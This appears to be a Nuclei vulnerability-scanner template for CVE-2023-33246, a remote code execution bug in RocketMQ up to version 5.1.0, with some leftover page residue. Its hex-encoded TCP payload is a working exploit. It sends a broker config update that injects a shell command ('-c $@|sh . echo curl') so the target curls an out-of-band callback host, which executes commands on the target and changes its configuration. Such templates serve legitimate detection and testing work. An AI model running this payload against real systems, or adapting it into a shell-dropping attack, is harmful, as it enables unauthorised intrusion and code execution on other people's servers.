30 lines
1017 B
YAML
30 lines
1017 B
YAML
|
id: CVE-2023-33246
|
||
|
|
||
|
info:
|
||
|
name: RocketMQ versions <= 5.1.0 Remote Code Execution
|
||
|
author: iamnoooob,rootxharsh,pdresearch
|
||
|
severity: critical
|
||
|
reference: https://github.com/I5N0rth/CVE-2023-33246
|
||
|
tags: cve,cve2023,rocketmq,rce
|
||
|
|
||
|
variables:
|
||
|
part_a: '{{ hex_decode ("000000d2000000607b22636f6465223a32352c22666c6167223a302c226c616e6775616765223a224a415641222c226f7061717565223a302c2273657269616c697a655479706543757272656e74525043223a224a534f4e222c2276657273696f6e223a3339357d66696c7465725365727665724e756d733d310a726f636b65746d71486f6d653d2d632024407c7368202e206563686f206375726c20") }}'
|
||
|
part_b: '{{ hex_decode("3b0a") }}'
|
||
|
tcp:
|
||
|
- inputs:
|
||
|
- data: '{{ part_a + "{{interactsh-url}}" + "/////////////" + part_b }}'
|
||
|
read: 1024
|
||
|
host:
|
||
|
- "{{Hostname}}"
|
||
|
read-size: 4
|
||
|
# matchers-condition: and
|
||
|
matchers:
|
||
|
- type: word
|
||
|
part: interactsh_protocol
|
||
|
words:
|
||
|
- "dns"
|
||
|
- "http"
|
||
|
- type: word
|
||
|
words:
|
||
|
- "serializeTypeCurrentRPC"
|